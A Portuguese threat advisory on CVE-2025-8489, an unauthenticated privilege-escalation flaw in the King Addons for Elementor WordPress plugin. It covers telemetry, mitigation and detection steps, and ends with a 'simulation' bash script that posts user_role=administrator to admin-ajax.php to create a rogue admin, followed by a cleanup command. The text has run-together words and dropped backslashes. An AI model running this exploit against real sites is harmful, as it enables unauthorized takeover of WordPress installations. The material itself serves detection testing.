Vulnerabilidade Crítica no King Addons para Elementor em Exploração Ativa

Resumo

Uma falha crítica de escalonamento de privilégios não autenticada (CVE-2025-8489) no plugin King Addons para Elementor do WordPress permite que invasores registrem novos usuários com privilégios de administrador. A falha tem sido explorada ativamente desde 31 de outubro de 2025, com o Wordfence bloqueando dezenas de milhares de tentativas. Os invasores exploram o problema por meio de solicitações POST elaboradas enviadas para o endpoint admin-ajax.php. As versões 24.12.92 a 51.1.14 são afetadas, com uma correção disponível na versão 51.1.35.

Investigação

A telemetria do Wordfence registrou mais de 48.400 tentativas de exploração, com um aumento notável em 9–10 de novembro de 2025. O endereço IPv6 de origem individual mais ativo foi 2602:fa59:3:424::1. Cargas úteis maliciosas utilizam dados POST HTTP que configuram o parâmetro user_role para administrador durante o fluxo de trabalho de registro. Nenhum adicional de malware foi observado além da criação de contas administrativas fraudulentas.

Mitigação

Atualize o King Addons para Elementor para a versão 51.1.35 ou mais recente. Ative as proteções do firewall do Wordfence lançadas em 4 de agosto de 2025 (premium) e 3 de setembro de 2025 (gratuito). Audite as listas de usuários do WordPress para contas de administrador inesperadas e revise continuamente os logs em busca do padrão POST suspeito.

Resposta

Acione alertas no tráfego POST para /wp-admin/admin-ajax.php que inclua user_role=administrator. Bloqueie endereços IP abusivos, com atenção especial ao endereço IPv6 destacado. Realize verificações de higiene de contas e remova qualquer usuários administradores não autorizados. Implante assinaturas IDS baseadas em host ajustadas para a estrutura de solicitação observada.

Execução de Simulação

Pré-requisito: O Check de Pré-voo de Telemetria & Linha de Base deve ter sido aprovado.

• Narrativa e Comandos de Ataque:
  Um adversário descobre CVE‑2025‑8489 no plugin King Addons para Elementor. Eles elaboram uma requisição POST paraadmin-ajax.phpque inclui oparâmetro action=king_addons_user_register(necessário pelo plugin)andforça o papel do novo usuário aadministradorviauser_role=administrator. Ao enviar esta solicitação diretamente para o endpoint vulnerável, o invasor obtém uma conta privilegiada do WordPress sem precisar de autenticação prévia. A carga é codificada em URL para replicar um cliente web realista.

• Script de Teste de Regressão:

  #!/usr/bin/env bash
  # Exploit script para escalonamento de privilégio do King Addons para Elementor (CVE‑2025‑8489)
  
  TARGET="http://webserver.example.com"
  ENDPOINT="/wp-admin/admin-ajax.php"
  
  # Dados POST elaborados (codificado em URL)
  POST_DATA="action=king_addons_user_register&user_login=eviladmin&user_email=evil@example.com&user_pass=P@ssw0rd!&user_role=administrator"
  
  echo "[*] Enviando payload de exploração..."
  curl -s -o /dev/null -w "%{http_code}" -X POST "${TARGET}${ENDPOINT}" 
       -H "Content-Type: application/x-www-form-urlencoded" 
       --data "${POST_DATA}"
  
  echo -e "n[+] Exploit enviado. Verifique o SIEM para o alerta gerado."

• Comandos de Limpeza:

  # Remova o usuário malicioso criado durante o teste
  curl -X POST "http://webserver.example.com/wp-admin/admin-ajax.php" 
    -d "action=delete_user&user_id=$(curl -s "http://webserver.example.com/wp-json/wp/v2/users?search=eviladmin" | jq -r '.[0].id')"
  echo "[*] Limpeza concluída."